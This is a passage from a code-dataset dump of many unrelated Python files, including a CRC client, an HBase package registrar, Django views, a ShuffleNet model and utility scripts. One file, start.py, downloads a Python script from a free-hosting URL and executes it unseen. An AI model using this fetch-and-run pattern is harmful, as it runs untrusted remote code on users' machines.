numBits]\r\n\r\n while numBits < len(self.appendedData):\r\n\r\n # If Leftmost bit is 1\r\n if subpartSubstring[0] == '1':\r\n\r\n # Using self.generator and appending a data bit at the end\r\n subpartSubstring = self.XOR(self.generator, subpartSubstring) + self.appendedData[numBits]\r\n # Else if leftmost bit is 0\r\n else:\r\n # Using all '0's generator\r\n subpartSubstring = self.XOR('0'*numBits, subpartSubstring) + divident[numBits]\r\n\r\n # increment numBits to move further\r\n numBits += 1\r\n\r\n # For the last nth bits, otherwise out of bound occurs due to numBits\r\n # If Leftmost bit is 1\r\n if subpartSubstring[0] == '1':\r\n\r\n # Using self.generator\r\n subpartSubstring = self.XOR(divisor, subpartSubstring)\r\n # Else if leftmost bit is 0\r\n else:\r\n\r\n # Using all '0's generator\r\n subpartSubstring = self.XOR('0' * numBits, subpartSubstring)\r\n\r\n # Returning checksum answer\r\n checksum = subpartSubstring\r\n return checksum\r\n\r\n def XOR(self, messagePartition, generator):\r\n \"\"\"Function to xor a messagePartition and generator.\r\n Also cutting of first bit of xor.\"\"\"\r\n\r\n # Variable required\r\n self.xor = \"\"\r\n # Iterating through bits at respective positions\r\n for bit1, bit2 in zip(messagePartition, generator):\r\n # XORing\r\n if bit1 == bit2:\r\n self.xor = self.xor + \"0\"\r\n else:\r\n self.xor = self.xor + \"1\"\r\n\r\n # Returning answer\r\n return self.xor[1 : ]\r\n\r\n\r\n\r\n\r\n\r\n# Calling main function\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"shashwatkathuria/Socket-Programming","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":9370,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"18085984671","text":"import logging\nimport json\n\nimport happybase\nfrom Hbase_thrift import AlreadyExists\n\nfrom package_parser import PackageParser\nfrom deployer_utils import HDFS\n\nfrom exceptiondef import FailedConnection\n\nfrom hbase_utils import encode,decode\n\nclass HbasePackageRegistrar(object):\n COLUMN_DEPLOY_STATUS = 'cf:deploy_status'\n\n def __init__(self, hbase_host, hdfs_host, hdfs_user, hdfs_port, package_local_dir_path):\n self._hbase_host = hbase_host\n self._hdfs_user = hdfs_user\n self._hdfs_host = hdfs_host\n self._hdfs_port = hdfs_port\n self._hdfs_client = HDFS(hdfs_host, hdfs_port, hdfs_user)\n self._parser = PackageParser()\n self._table_name = 'platform_packages'\n self._dm_root_dir_path = \"/pnda/system/deployment-manager\"\n self._package_hdfs_dir_path = \"%s/packages\" % self._dm_root_dir_path\n self._package_local_dir_path = package_local_dir_path\n\n try:\n if hdfs_host is not None:\n self._hdfs_client.make_dir(self._dm_root_dir_path, permission=755)\n self._hdfs_client.make_dir(self._package_hdfs_dir_path, permission=600)\n logging.debug(\"packages HDFS folder created\")\n else:\n logging.debug(\"not creating packages HDFS folder as it is not required\")\n except AlreadyExists:\n logging.debug(\"not creating packages HDFS folder as it already exists\")\n\n if self._hbase_host is not None:\n connection = happybase.Connection(self._hbase_host)\n try:\n connection.create_table(self._table_name, {'cf': dict()})\n logging.debug(\"packages table created\")\n except AlreadyExists:\n logging.debug(\"packages table exists\")\n finally:\n connection.close()\n\n def set_package(self, package_name, package_data_path, user):\n logging.debug(\"Storing %s\", package_name)\n metadata = 
self._parser.get_package_metadata(package_data_path)\n metadata['user'] = user\n key, data = self.generate_record(metadata)\n self._write_to_hdfs(package_data_path, data['cf:package_data'])\n self._write_to_db(key, data)\n\n def set_package_deploy_status(self, package_name, deploy_status):\n \"\"\"\n Stores information about the progress of the deploy process of the package\n :param deploy_status: the state to store\n \"\"\"\n logging.debug(\"Storing state for %s: %s\", package_name, str(deploy_status))\n state_as_string = json.dumps(deploy_status)\n self._write_to_db(package_name, {self.COLUMN_DEPLOY_STATUS: state_as_string})\n\n def delete_package(self, package_name):\n logging.debug(\"Deleting %s\", package_name)\n package_data_hdfs_path = self._read_from_db(package_name, ['cf:package_data'])['cf:package_data']\n self._hdfs_client.remove(package_data_hdfs_path)\n connection = happybase.Connection(self._hbase_host)\n try:\n table = connection.table(self._table_name)\n table.delete(package_name)\n finally:\n connection.close()\n\n def get_package_data(self, package_name):\n logging.debug(\"Reading %s\", package_name)\n record = self._read_from_db(package_name, ['cf:package_data'])\n if not record:\n return None\n local_package_path = \"%s/%s\" % (self._package_local_dir_path, package_name)\n self._read_from_hdfs(record['cf:package_data'], local_package_path)\n return local_package_path\n\n def get_package_metadata(self, package_name):\n logging.debug(\"Reading %s\", package_name)\n package_data = self._read_from_db(\n package_name, ['cf:metadata', 'cf:name', 'cf:version'])\n if not package_data:\n return None\n return {\"metadata\": json.loads(package_data['cf:metadata']), \"name\": package_data[\n 'cf:name'], \"version\": package_data['cf:version']}\n\n def package_exists(self, package_name):\n logging.debug(\"Checking %s\", package_name)\n package_data = self._read_from_db(package_name, ['cf:name'])\n return len(package_data) > 0\n\n def get_package_deploy_status(self, package_name):\n \"\"\"\n :param package_name: the package name to check status for\n :return: The last reported progress of the deploy process for the current package\n \"\"\"\n logging.debug(\"Checking %s\", package_name)\n package_data = self._read_from_db(package_name, columns=[self.COLUMN_DEPLOY_STATUS])\n if not package_data:\n return None\n # all status is stored as json, so parse it and return it\n deploy_status_as_string = package_data[self.COLUMN_DEPLOY_STATUS]\n return json.loads(deploy_status_as_string)\n\n def list_packages(self):\n logging.debug(\"List all packages\")\n\n connection = None\n try:\n connection = happybase.Connection(self._hbase_host)\n table = connection.table(self._table_name)\n result = [key.decode() for key, _ in table.scan(columns=['cf:name'])]\n except Exception as exc:\n logging.debug(str(exc))\n raise FailedConnection('Unable to connect to the HBase master')\n finally:\n if connection:\n connection.close()\n return result\n\n def generate_record(self, metadata):\n return metadata[\"package_name\"], {\n 'cf:name': '-'.join(metadata[\"package_name\"].split(\"-\")[:-1]),\n 'cf:version': metadata[\"package_name\"].split(\"-\")[-1],\n 'cf:metadata': json.dumps(metadata),\n 'cf:package_data': \"%s/%s\" % (self._package_hdfs_dir_path, metadata[\"package_name\"])\n }\n\n def _read_from_db(self, key, columns):\n connection = happybase.Connection(self._hbase_host)\n try:\n table = connection.table(self._table_name)\n data = table.row(encode(key), columns=encode(columns))\n finally:\n 
connection.close()\n \n return decode(data)\n\n def _read_from_hdfs(self, source_hdfs_path, dest_local_path):\n self._hdfs_client.stream_file_to_disk(source_hdfs_path, dest_local_path)\n\n def _write_to_db(self, key, data):\n connection = happybase.Connection(self._hbase_host)\n try:\n table = connection.table(self._table_name)\n table.put(encode(key), encode(data))\n finally:\n connection.close()\n\n def _write_to_hdfs(self, source_local_path, dest_hdfs_path):\n with open(source_local_path, 'rb') as source_file:\n first = True\n chunk_size = 10*1024*1024\n data_chunk = source_file.read(chunk_size)\n while data_chunk:\n if first:\n self._hdfs_client.create_file(data_chunk, dest_hdfs_path, permission=600)\n first = False\n else:\n self._hdfs_client.append_file(data_chunk, dest_hdfs_path)\n data_chunk = source_file.read(chunk_size)\n","repo_name":"pndaproject/platform-deployment-manager","sub_path":"api/src/main/resources/package_registrar.py","file_name":"package_registrar.py","file_ext":"py","file_size_in_byte":7048,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"5648979492","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import login\nfrom ayomi_website.authentication.forms import SignUpForm, ChangeEmailForm\n\n\ndef signup(request):\n \"\"\"A view that displays the new account registration form.\n And save the new account to the database.\"\"\"\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n return redirect('account')\n else:\n form = SignUpForm()\n return render(request, 'authentication/signup.html',\n {'form': form})\n else:\n form = SignUpForm()\n return render(request, 'authentication/signup.html', {'form': form})\n\n\ndef account_view(request):\n \"\"\"A view that displays the details of a user account.\"\"\"\n if request.user.is_authenticated:\n user = request.user\n form = ChangeEmailForm()\n return render(request, 'authentication/account.html',\n {'user': user, 'form': form})\n else:\n return redirect('login')\n\n\ndef change_email(request):\n \"\"\"A view that changes the user's password\"\"\"\n form = ChangeEmailForm(request.POST)\n if request.user.is_authenticated:\n user = request.user\n if request.method == 'POST':\n if form.is_valid():\n user.email = form.cleaned_data['email']\n user.save()\n return render(request, 'authentication/account.html',\n {'user': user, 'form': form})\n else:\n render(request, 'authentication/account.html',\n {'user': user, 'form': form})\n else:\n render(request, 'authentication/account.html',\n {'user': user, 'form': form})\n else:\n return redirect('login')\n","repo_name":"micktymoon/ayomi_website_test","sub_path":"ayomi_website/authentication/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29187862150","text":"import os\nimport pandas as pd\n\nwriter = pd.ExcelWriter('out.xlsx', engine='xlsxwriter')\nall_files = os.listdir('Results/compiled/')\nfor f in all_files:\n df = pd.read_csv('Results/compiled/'+f)\n df.to_excel(writer, sheet_name=os.path.basename(f))\n\nwriter.save()","repo_name":"sehejjain/Nature-Inspired-Algorithms","sub_path":"combine_sheets.py","file_name":"combine_sheets.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} 
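[Editor's note — not part of the dataset] The combine_sheets.py record directly above ends with writer.save(), which recent pandas releases removed in favor of using ExcelWriter as a context manager. A minimal sketch of the same CSV-to-workbook merge under that assumption — the 'Results/compiled/' path and 'out.xlsx' name come from the record itself; the 31-character truncation is an added safeguard, not the author's code:

import os
import pandas as pd

# Open the writer as a context manager so the workbook is saved on exit;
# this replaces the removed writer.save() call.
with pd.ExcelWriter('out.xlsx', engine='xlsxwriter') as writer:
    for f in os.listdir('Results/compiled/'):
        df = pd.read_csv(os.path.join('Results/compiled/', f))
        # Excel caps sheet names at 31 characters, so truncate defensively.
        df.to_excel(writer, sheet_name=os.path.basename(f)[:31])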
+{"seq_id":"38421346243","text":"# -*- coding: utf-8 -*-\nimport lea.data.Data as data\nimport lea.mesure.Piv3D as piv\nimport lea.mesure.Mesure as m\nimport lea.hdf5.h5py_convert as h5py\nimport lea.hdf5.routine as routine\n\nimport os\nimport glob\nimport time\n\n#basefolder = '/media/stephane/DATA/Experimental_data/Turbulence3d'\n#adresse_s = basefolder\n#routine.convert_arbo(basefolder, adresse_s)\n\n\n###Création de la Data :###\n##Depuis un fichier cine, jpg, dossier...\ndate = \"20181126\"\nheure = \"1000\"\n\n#base = \"/media/stephane/\"\n#folder = 'DATA/Experimental_data/Turbulence3d/'+date+'/'\n\nbase = \"\"\nfolder = '/Volumes/Diderot/DATA_Princeton_November2018/20181126/'\nadresse_s= '/Users/stephane/Documents/Postdoc_Princeton/Piv3d/20181106/'\n\n\nl =glob.glob(base+folder+'*.cine')\nprint(\"number of cinefiles : \"+str(len(l)))\n\ncinefile = l[0].rsplit(\".\",1)[0]\n\nfichier = cinefile+'.cine'#\"/media/stephane/OS/Documents and Settings/Stephane/Documents/Data_buffer/20181010/PIV3dscan_nikon50mm_f1kHz_A800mV_offsetm2800mV_4pumpsOn.cine\"\n#cherche le fichier param associé\nparam =glob.glob(base+folder+'*.txt')[0] #si un seul fichier param présent\nspec=fichier\n\nd = data.Data(fichier, param, spec, date=date, heure=heure)\n##Depuis un fichier hdf5\n#data = h5py_in_Data(ouverture_fichier(\"/home/ldupuy/Documents/Stage_Python_(2018)/new/20171109_1_frame.hdf5\"))\n###Création de Mesure et de ses sous-classes###\n##Création de Mesure\nmesure = m.Mesure(d)\n\n##Création de Piv3D\npiv3 = piv.Piv3D(d)\nmesure.add_measurement(piv3)\nt1 = time.time()\n#print(d.param.fx)\n#print(d.param.fps)\n#print(d.param.f)\noverlap = 16\nwindow_size = 32\n\npiv3 = piv3.analysis_multi_proc('', cinefile, cinefile, npy=None, fx='toto', dt_origin=None, frame_diff=None, crop_lims=None, maskers=None, window_size=window_size, overlap=overlap, search_area_size=window_size, save=False, s2n_thresh=1.2, bg_n_frames=None)\nt2 = time.time()\n###Mise des données dans un fichier HDF5###\n##Si le fichier est déjà crée :\n#f = ouverture_fichier(\"/home/ldupuy/Documents/Stage_Python_(2018)/new/Mesure_0_20171109_1_frame.hdf5\")\n##Pour créer le fichier\nf = h5py.file_name_in_dir(mesure, adresse_s)\nh5py.obj_in_h5py(mesure, f)\n\n\nprint(\"temps : \")\nprint(t2-t1)\n","repo_name":"PerrardCodes/databook","sub_path":"Lea/lea/exemple/exemple_piv3d.py","file_name":"exemple_piv3d.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3992246149","text":"import requests\n\n# Define the API endpoint URL\napi_url = \"https://udacity-salary-predictor-e0d91f043730.herokuapp.com/predict/\" # NOQA\n\n# Sample input data for model inference\ninput_data = {\n \"data\": [\n {\n \"age\": 46,\n \"workclass\": \"Private\",\n \"fnlgt\": 369538,\n \"education\": \"10th\",\n \"education_num\": 6,\n \"marital_status\": \"Married-civ-spouse\",\n \"occupation\": \"Transport-moving\",\n \"relationship\": \"Husband\",\n \"race\": \"White\",\n \"sex\": \"Male\",\n \"capital_gain\": 0,\n \"capital_loss\": 0,\n \"hours_per_week\": 40,\n \"native_country\": \"United-States\",\n },\n {\n \"age\": 45,\n \"workclass\": \"Private\",\n \"fnlgt\": 172274,\n \"education\": \"Doctorate\",\n \"education_num\": 16,\n \"marital_status\": \"Divorced\",\n \"occupation\": \"Prof-specialty\",\n \"relationship\": \"Unmarried\",\n \"race\": \"Black\",\n \"sex\": \"Female\",\n \"capital_gain\": 0,\n \"capital_loss\": 3004,\n \"hours_per_week\": 35,\n 
\"native_country\": \"United-States\",\n },\n {\n \"age\": 20,\n \"workclass\": \"Private\",\n \"fnlgt\": 44064,\n \"education\": \"Some-college\",\n \"education_num\": 10,\n \"marital_status\": \"Never-married\",\n \"occupation\": \"Prof-specialty\",\n \"relationship\": \"Own-child\",\n \"race\": \"White\",\n \"sex\": \"Male\",\n \"capital_gain\": 0,\n \"capital_loss\": 0,\n \"hours_per_week\": 25,\n \"native_country\": \"United-States\",\n },\n ]\n}\n\n# Send a POST request to the API\nresponse = requests.post(api_url, json=input_data)\n\n# Get the result and status code from the response\nresult = response.json()\nstatus_code = response.status_code\n\n# Print the results\nprint(\"Model Inference Result:\", result)\nprint(\"Status Code:\", status_code)\n","repo_name":"JitendraRVarma/deploy-ml-model-with-fastapi","sub_path":"post_request.py","file_name":"post_request.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7811997640","text":"class Dictionary:\n NOUN = \"N\"\n VERB = \"V\"\n ADJECTIVE = \"A\"\n PRONOUN = \"P\"\n ADVERB = \"R\"\n ADPOSITION = \"S\"\n CONJUCTION = \"C\"\n NUMERAL = \"M\"\n PARTICLE = \"Q\"\n INTERJECTION = \"I\"\n ABBRECIATION = \"Y\"\n RESIDUAL = \"X\"\n PUNCTUATION = \"Z\"\n \n @property\n def node_list(self):\n return self._node_list\n \n @property\n def edge_list(self):\n return self._edge_list\n \n @property\n def original_nominative_list(self):\n return self._original_nominative_list\n \n @property\n def nominative_original_list(self):\n return self._nominative_original_list\n \n @property\n def words_types(self):\n return self._words_types\n \n @property\n def all_types(self):\n return [\n Dictionary.NOUN,\n Dictionary.VERB,\n Dictionary.ADJECTIVE,\n Dictionary.PRONOUN,\n Dictionary.ADVERB,\n Dictionary.ADPOSITION,\n Dictionary.CONJUCTION,\n Dictionary.NUMERAL,\n Dictionary.PARTICLE,\n Dictionary.INTERJECTION,\n Dictionary.ABBRECIATION,\n Dictionary.RESIDUAL,\n Dictionary.PUNCTUATION\n ]\n \n # dictionary_path specifies relative path of file where marked words are \n def __init__(self, dictionary_path=None):\n self._dictionary_path = dictionary_path\n # mark column indexes in dictionary_path \n self._word_pos_idx = 0 # word position index column\n self._word_original_idx = 1 # original word column index\n self._word_type_idx = 2 # word type column index\n self._word_nominative_idx = 3 # word as nominative column index\n self._node_list = []\n self._edge_list = []\n self._original_nominative_list = []\n self._nominative_original_list = []\n self._words_types = []\n \n # sentences from which words will be compared in dictionary file.\n # wanted word types contains array of wanted types that will be extracted (nouns, verbs etc)\n def set_words_as_node_and_egde_list(self, sentences_list, word_types):\n dictionary_lines = None\n with open(self._dictionary_path, \"r\", encoding=\"utf-8\", errors = \"ignore\") as f:\n # read all dictionary\n dictionary_lines = f.readlines()\n \n # loop through sentences in text\n for sentence in sentences_list:\n # list that will store words that are found in dictionary and are valid type\n valid_words = []\n # loop thourhg each word in sentence text\n for word in sentence.split():\n # search for word in dictionary by looping through each line \n for dict_line in dictionary_lines:\n \n # split dictionary line into columns\n columns = dict_line.split()\n \n # if column contains anything \n if len(columns) > 0:\n # check if 
dictionary word has valid type and sentence contains word from dictionary\n if self.__is_valid_type(columns, word_types) and word == columns[self._word_original_idx]:\n nominative = columns[self._word_nominative_idx]\n # if word is valid, get it as nominative from dictionary\n valid_words.append(nominative) \n \n self._original_nominative_list.append((word, nominative))\n self._nominative_original_list.append((nominative, word))\n self._words_types.append((word, columns[self._word_type_idx][0]))\n break \n \n # if sentence contains only one valid word, add it to node list\n if len(valid_words) == 1:\n self._node_list.append(valid_words[0])\n # sentence contains more than one one valid word, add it to edge list\n else: \n # gets edge list as dictionary where preceding word is key and every word after is value\n for linked_words in self.__get_edge_list_for_sentence(valid_words):\n # if key and value doesn't have same value then add it to edge list. Same word cannot be linked to itself\n if linked_words[0] != linked_words[1]:\n self._edge_list.append(linked_words)\n else:\n # if key/value are same then add it as node\n self._node_list.append(linked_words[0])\n\n # add weights do node list where every time same pair words appear, their weight is incremented by 1.0\n def set_edge_list_as_weighted_edges(self, weight_value = 1.0):\n # temporary list which will containt distinct edge list and \n # each element will be tuple in format (edge.key, edge.value, weight)\n tmp_weight_list = []\n \n for edge in self.edge_list:\n # flag to test if edge list item is already added to tmp_list\n found = False\n # index of temp item\n tmp_idx = 0\n for tmp_item in tmp_weight_list:\n # if key/value from orig list match with temp list (item is already added to temp list)\n if edge == (tmp_item[0], tmp_item[1]):\n # tuple objects are immutable so assignment to one element is not possible, \n # then whole tuple item must be replaced and weight is incremented by weight_value\n tmp_weight_list[tmp_idx] = (tmp_item[0], tmp_item[1], tmp_item[2] + weight_value)\n found = True\n break\n # increment temp item index if not found\n tmp_idx +=1\n # if edge item is not added to temp list\n if not found:\n # add edge item to temp list with default weight value\n tmp_weight_list.append((edge[0], edge[1], weight_value))\n \n self._edge_list = tmp_weight_list\n \n def __is_valid_type(self, dictionary_column, wanted_word_types):\n # check if cell has content and check that first letter in cell marks wanted word type\n return (dictionary_column[self._word_type_idx][0] in wanted_word_types)\n \n def __sentence_contains(self, sentence, dictionary_column):\n return (dictionary_column[self._word_original_idx] in sentence.split())\n \n def __get_edge_list_for_sentence(self, words):\n edge_dict = []\n \n for i in range(0, len(words) - 2):\n for j in range(i + 1, len(words) - 1):\n edge_dict.append((words[i], words[j]))\n \n return edge_dict\n ","repo_name":"rcvjet15/networkx-text-summary","sub_path":"dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":6906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6676489467","text":"#!/data/data/com.termux/files/usr/bin/python3.8\n\nimport requests\nfrom os import system\n\na = requests.get('https://friend3ds.000webhostapp.com/test/test.py')\n\nwith open('log.py', 'w+') as log:\n log.write(a.text)\n\nsystem('clear')\nsystem('python 
log.py')\n","repo_name":"shetel/tool_market","sub_path":"start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23914536704","text":"# encoding: utf-8\n# from https://github.com/tinyalpha/shuffleNet-cifar10\nimport math\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass idenUnit(nn.Module):\n def __init__(self, input_channel, g):\n super(idenUnit, self).__init__()\n\n # bottle neck channel = input channel / 4, as the paper did\n neck_channel = int(input_channel / 4)\n\n # conv layers, GConv - (shuffle) -> DWConv -> Gconv\n # bn, relu bn bn\n self.gconv1 = nn.Conv2d(input_channel, neck_channel, groups = g, kernel_size = 1, bias = False)\n self.bn1 = nn.BatchNorm2d(neck_channel)\n\n self.dwconv = nn.Conv2d(neck_channel, neck_channel, groups = neck_channel, kernel_size = 3, \n padding = 1, bias = False)\n self.bn = nn.BatchNorm2d(neck_channel)\n\n self.gconv2 = nn.Conv2d(neck_channel, input_channel, groups = g, kernel_size = 1, bias = False)\n self.bn2 = nn.BatchNorm2d(input_channel)\n\n # for channel shuffle operation \n self.g, self.n = g, neck_channel//g\n assert self.n == int(self.n), \"wrong shape to shuffle\"\n\n\n def forward(self, inputs):\n x = F.relu(self.bn1(self.gconv1(inputs)))\n \n # channel shuffle\n n, c, w, h = x.shape\n x = x.view(n, self.g, self.n, w, h)\n x = x.transpose_(1, 2).contiguous()\n x = x.view(n, c, w, h)\n\n x = self.bn(self.dwconv(x))\n x = self.bn2(self.gconv2(x))\n\n return F.relu(x + inputs)\n\n\nclass poolUnit(nn.Module):\n def __init__(self, input_channel, output_channel, g, first_group = True, downsample = True):\n super(poolUnit, self).__init__()\n self.downsample = downsample\n\n # bottle neck channel = input channel / 4, as the paper did\n neck_channel = int(output_channel / 4)\n\n # conv layers, GConv - (shuffle) -> DWConv -> Gconv\n # bn,relu bn bn\n if first_group:\n self.gconv1 = nn.Conv2d(input_channel, neck_channel, groups = g, kernel_size = 1, bias = False)\n else:\n self.gconv1 = nn.Conv2d(input_channel, neck_channel, kernel_size = 1, bias = False)\n \n self.bn1 = nn.BatchNorm2d(neck_channel)\n\n stride = 2 if downsample else 1\n self.dwconv = nn.Conv2d(neck_channel, neck_channel, groups = neck_channel, stride = stride, kernel_size = 3, \n padding = 1, bias = False)\n self.bn = nn.BatchNorm2d(neck_channel)\n\n self.gconv2 = nn.Conv2d(neck_channel, output_channel - input_channel, groups = g, kernel_size = 1, bias = False)\n self.bn2 = nn.BatchNorm2d(output_channel - input_channel)\n\n # for channel shuffle operation \n self.g, self.n = g, neck_channel//g\n assert self.n == int(self.n), \"error shape to shuffle\"\n\n\n def forward(self, inputs):\n x = F.relu(self.bn1(self.gconv1(inputs)))\n \n # channel shuffle\n n, c, w, h = x.shape\n # print(n, c, w, h)\n x = x.view(n, self.g, self.n, w, h)\n x = x.transpose_(1, 2).contiguous()\n x = x.view(n, c, w, h)\n\n x = self.bn(self.dwconv(x))\n x = self.bn2(self.gconv2(x))\n\n shortcut = F.avg_pool2d(inputs, 2) if self.downsample else inputs\n return F.relu(torch.cat((x, shortcut), dim = 1))\n\n\nclass ShuffleNet(nn.Module):\n def __init__(self, output_size, scale_factor = 1, g = 8):\n super(ShuffleNet, self).__init__()\n self.g = g\n # self.cs = {1: 144, 2: 200, 3: 240, 4: 272, 8: 384}\n self.cs = {1: 144, 2: 200, 3: 240, 4: 272, 8: 384}\n\n # compute output channels for stages\n c2 = self.cs[self.g]\n c2 = int(scale_factor * c2)\n c3, c4 = 2*c2, 
4*c2\n\n # first conv layer & last fc layer\n self.conv1 = nn.Conv2d(3, 24, kernel_size = 3, padding = 1, stride = 1, bias = False)\n self.bn1 = nn.BatchNorm2d(24)\n\n self.fc = nn.Linear(c4, output_size)\n\n # build stages\n self.stage2 = self.build_stage(24, c2, repeat_time = 3, first_group = False, downsample = False)\n self.stage3 = self.build_stage(c2, c3, repeat_time = 7)\n self.stage4 = self.build_stage(c3, c4, repeat_time = 3)\n\n # weights init\n self.weights_init()\n\n\n def build_stage(self, input_channel, output_channel, repeat_time, first_group = True, downsample = True):\n stage = [poolUnit(input_channel, output_channel, self.g, first_group = first_group, downsample = downsample)]\n \n for i in range(repeat_time):\n stage.append(idenUnit(output_channel, self.g))\n\n return nn.Sequential(*stage) \n\n\n\n def weights_init(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n\n\n def forward(self, inputs):\n\n # first conv layer\n x = F.relu(self.bn1(self.conv1(inputs)))\n # x = F.max_pool2d(x, kernel_size = 3, stride = 2, padding = 1)\n # assert x.shape[1:] == torch.Size([24,56,56])\n\n # bottlenecks\n x = self.stage2(x)\n x = self.stage3(x)\n x = self.stage4(x)\n # print(x.shape)\n\n # global pooling and fc (in place of conv 1x1 in paper)\n x = F.adaptive_avg_pool2d(x, 1)\n x = x.view(x.shape[0], -1)\n x = self.fc(x)\n\n return x","repo_name":"nlsde-safety-team/DefensivePatch","sub_path":"models/shufflenet.py","file_name":"shufflenet.py","file_ext":"py","file_size_in_byte":5561,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"41708219671","text":"import gzip\nimport collections\nimport json\nimport os\n\n__vocabulary_search_paths=[\n os.path.dirname(os.path.realpath(__file__)) + '/vocabularies/{}',\n '{}',\n os.getcwd() + '/{}',\n os.getenv('HOME') + '/.fakr/{}',\n]\n\ndef write(fp, data: collections.Sequence) -> None:\n jsoned=json.dumps(data).encode()\n gzipped=gzip.compress(bytes(jsoned))\n\n fp.write(gzipped)\n\n\ndef read(fp) -> collections.Sequence:\n gzipped=fp.read()\n jsoned=gzip.decompress(gzipped).decode()\n\n return json.loads(jsoned)\n\n\ndef search(file: str) -> str:\n for p in __vocabulary_search_paths:\n guess=os.path.realpath(p.format(file))\n if os.path.isfile(guess):\n return guess\n\n return file\n","repo_name":"l-x/fakr","sub_path":"fakr/vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"3135852372","text":"# ping_controller.py\n\n\nfrom flask import Blueprint\nfrom flask_restx import Resource, Api, Namespace\n\napi = Namespace('ping', description=\"Sanity check endpoint\")\n\n\n@api.route('/')\nclass Ping(Resource):\n\n def get(self):\n return {\n 'status': 'success',\n 'message': 'pong!'\n }\n","repo_name":"toehmler/seshn","sub_path":"seshn-server/src/api/ping/ping_controller.py","file_name":"ping_controller.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18327438985","text":"\"\"\"\n给定一个m*n的二维列表,查找一个数是否存在,列表的如下特性:\n* 每一行的列表都是从左到右已经排好的\n* 每一行的第一个数字比上一行最后一个数字都大\n\"\"\"\n\n# # 第一种方法\n# class Solution:\n# def searchMatrix(self,matrix,target):\n# 
\"\"\"\n# :param matrix: list[list[int]]\n# :param target: int\n# :return: bool\n# \"\"\"\n# for line in matrix:\n# # 注意这个in的时间复杂度是O(n),整体的时间复杂度是O(n^2)\n# if target in line:\n# return True\n# else:\n# return False\n\n\nclass Solution:\n def searchMatrix(self,matrix,target):\n \"\"\"\n :param matrix: list[list[int]]\n :param target: int\n :return: bool\n \"\"\"\n h = len(matrix)\n if h == 0:\n return False # []\n w = len(matrix[0])\n if w == 0:\n return False\n left = 0\n right = w*h-1\n while left <= right:\n mid = (left+right)//2\n # 对mid的数值转化成二维列表中数值的真是存在\n i = mid // w\n j = mid % w\n if matrix[i][j] == target:\n return True\n elif matrix[i][j] >target:\n right = mid-1\n else:\n left = mid+1\n else:\n return False\n\na = [[1,2,3,4],[5,6,7,8],[9,10,12,14]]\ns = Solution()\nprint(s.searchMatrix(a,13))","repo_name":"waws520waws/the-god-of-algorithms","sub_path":"数据结构查找_排序的习题/二维列表_查数字是否存在.py","file_name":"二维列表_查数字是否存在.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2041197133","text":"import importlib\nimport logging\nimport re\nimport sys\nimport time\n\nfrom boto.route53.record import ResourceRecordSets\n\nlogger = logging.getLogger(__name__)\n\n\ndef retry_with_backoff(function, args=None, kwargs=None, attempts=5,\n min_delay=1, max_delay=3, exc_list=None,\n retry_checker=None):\n \"\"\"Retries function, catching expected Exceptions.\n\n Each retry has a delay between `min_delay` and `max_delay` seconds,\n increasing with each attempt.\n\n Args:\n function (function): The function to call.\n args (Optional(list)): A list of positional arguments to pass to the\n given function.\n kwargs (Optional(dict)): Keyword arguments to pass to the given\n function.\n attempts (Optional(int)): The # of times to retry the function.\n Default: 5\n min_delay (Optional(int)): The minimum time to delay retries, in\n seconds. Default: 1\n max_delay (Optional(int)): The maximum time to delay retries, in\n seconds. Default: 5\n exc_list (Optional(list)): A list of :class:`Exception` classes that\n should be retried. Default: [:class:`Exception`,]\n retry_checker (Optional(func)): An optional function that is used to\n do a deeper analysis on the received :class:`Exception` to\n determine if it qualifies for retry. Receives a single argument,\n the :class:`Exception` object that was caught. Should return\n True if it should be retried.\n\n Returns:\n variable: Returns whatever the given function returns.\n\n Raises:\n :class:`Exception`: Raises whatever exception the given function\n raises, if unable to succeed within the given number of attempts.\n \"\"\"\n args = args or []\n kwargs = kwargs or {}\n attempt = 0\n if not exc_list:\n exc_list = (Exception, )\n while True:\n attempt += 1\n logger.debug(\"Calling %s, attempt %d.\", function, attempt)\n sleep_time = min(max_delay, min_delay * attempt)\n try:\n return function(*args, **kwargs)\n except exc_list as e:\n # If there is no retry checker function, or if there is and it\n # returns True, then go ahead and retry\n if not retry_checker or retry_checker(e):\n if attempt == attempts:\n logger.error(\"Function %s failed after %s retries. 
